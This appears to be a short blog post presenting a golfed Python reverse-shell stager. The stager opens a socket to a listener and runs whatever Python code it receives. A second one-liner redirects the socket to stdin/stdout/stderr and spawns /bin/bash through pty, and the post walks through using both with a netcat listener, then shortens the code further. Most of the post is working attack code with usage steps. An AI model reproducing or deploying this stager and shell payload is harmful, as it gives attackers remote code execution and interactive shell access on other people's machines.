import socket as a s=a.socket() s.connect(("localhost",24)) exec(s.recv(999))
This could more accurately be considered a stager than an actual bind shell. What this does is open a socket connection to (in this case) localhost on port 24. It then receives input from the server and executes it internally as python code. This still requires you to send it the actual Python code to start the shell, which I just paste into my netcat listener once it connects.
The recv/exec combo seems to do weird things with new lines so I just paste in the entire thing as one line:
import pty,os;os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash");s.close()
So once the python script connects, paste that one liner into the netcat session and hit ctrl+d (so as to not append a \n) and then bam, a shell shows up.
Let's see the golfers play at it :D
EDIT: I golfed it. You can make the connect line shorter by replacing "localhost" with "127.1" which is equivalent but less characters. This would bring the total number of characters from 77 to 72.
No comments:
Post a Comment